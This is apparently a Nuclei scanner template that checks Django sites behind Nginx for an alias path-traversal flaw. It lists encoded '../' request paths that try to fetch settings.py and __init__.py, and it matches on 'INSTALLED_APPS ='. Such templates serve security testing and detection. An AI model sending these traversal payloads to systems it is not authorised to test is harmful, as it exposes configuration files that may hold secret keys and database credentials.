id: django-nginx-alias-traversal11

info:
  name: Django Nginx Alias Traversal
  author: reewardius
  severity: medium
  tags: nginx,generic
  
http:
  - method: GET
    path:
      - "{{BaseURL}}../settings.py"
      - "{{BaseURL}}..%2fsettings.py"
      - "{{BaseURL}}../__init__.py"
      - "{{BaseURL}}../dev/settings.py"
      - "{{BaseURL}}../www/settings.py"
      - "{{BaseURL}}../website/settings.py"
      - "{{BaseURL}}../www/settings.py"
      - "{{BaseURL}}../__init__.py"
      - "{{BaseURL}}../app/settings.py"
      - "{{BaseURL}}../apps/settings.py"
      - "{{BaseURL}}../dev/settings.py"
      - "{{BaseURL}}../production/settings.py"
      - "{{BaseURL}}../project/settings.py"
      - "{{BaseURL}}../website/settings.py"
      - "{{BaseURL}}../www/settings.py"
      - "{{BaseURL}}../settings.py"
      - "{{BaseURL}}%2e%2e/settings.py"      
      - "{{BaseURL}}..%2fsettings.py"
      - "{{BaseURL}}%252F/settings.py" 

    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - "INSTALLED_APPS ="
        condition: or